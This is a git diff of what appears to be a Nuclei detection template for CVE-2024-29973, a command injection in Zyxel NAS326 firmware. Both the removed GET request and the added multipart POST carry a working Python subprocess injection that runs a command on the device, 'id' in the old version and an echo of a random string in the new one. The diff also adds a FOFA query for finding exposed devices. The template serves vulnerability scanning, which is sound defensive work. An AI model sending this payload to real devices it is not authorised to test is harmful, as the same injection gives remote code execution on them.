verified poc

http/cves/2024/CVE-2024-29973.yaml

@@ -1,7 +1,7 @@
 id: CVE-2024-29973
 
 info:
-  name: Zyxel NAS326 firmware < V5.21(AAZF.17)C0 - Command Injection
+  name: Zyxel NAS326 Firmware < V5.21(AAZF.17)C0 - Command Injection
   author: ritikchaddha
   severity: critical
   description: |
@@ -19,16 +19,27 @@ info:
     epss-percentile: 0.9971
     cpe: cpe:2.3:o:zyxel:nas326_firmware:*:*:*:*:*:*:*:*
   metadata:
+    verified: true
     max-request: 1
     vendor: zyxel
     product: nas326_firmware
-  tags: cve,cve2024,zyxel,rce
+    fofa-query: app="ZYXEL-NAS326"
+  tags: cve,cve2024,zyxel,rce,intrusive
+variables:
+  string: "{{randstr}}"
 
 http:
   - raw:
       - |
-        GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+and+False+or+__import__("subprocess").check_output("id",+shell=True)%23 HTTP/1.1
+        POST /cmd,/simZysh/register_main/setCookie HTTP/1.1
         Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
+
+        ------WebKitFormBoundarygcflwtei
+        Content-Disposition: form-data; name="c0"
+
+        storage_ext_cgi CGIGetExtStoInfo None) and False or __import__("subprocess").check_output("echo {{string}}", shell=True)#
+        ------WebKitFormBoundarygcflwtei--
 
     matchers:
       - type: dsl
@@ -36,5 +47,5 @@ http:
           - "status_code == 200"
           - "contains(body, 'errmsg0\": \"OK')"
           - "contains(header, 'application/json')"
-          - regex('uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)', body)
+          - "contains(body, '{{string}}')"
         condition: and